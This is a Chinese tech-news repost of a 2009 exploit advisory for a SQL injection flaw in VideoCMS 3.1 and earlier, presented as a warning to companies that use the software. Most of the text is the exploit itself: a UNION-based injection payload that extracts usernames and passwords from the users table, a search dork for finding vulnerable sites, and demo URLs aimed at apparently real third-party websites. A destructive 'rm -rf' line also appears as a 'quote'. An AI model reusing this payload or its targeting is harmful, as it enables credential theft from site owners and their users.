VideoCMS存在SQL注入漏洞使用此CMS的公司请做防范

【.com综合消息】VideoCMS存在SQL injection漏洞,使用此CMS的公司请做防范。以下是编辑找到的测试代码,仅做测试,请勿用于非法用途。

[~] VideoCMS SQL injection vulnerability - (id)                                   #

[~] Author : kaMtiEz (kamzcrew@gmail.com)                                    #

[~] Homepage : http://www.indonesiancoder.com                                  #

[~] Date : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : -
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. ????
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

网站栏目:VideoCMS存在SQL注入漏洞使用此CMS的公司请做防范
文章网址:http://www.mswzjz.cn/qtweb/news26/420026.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能,是专注品牌与效果的网络营销公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 贝锐智能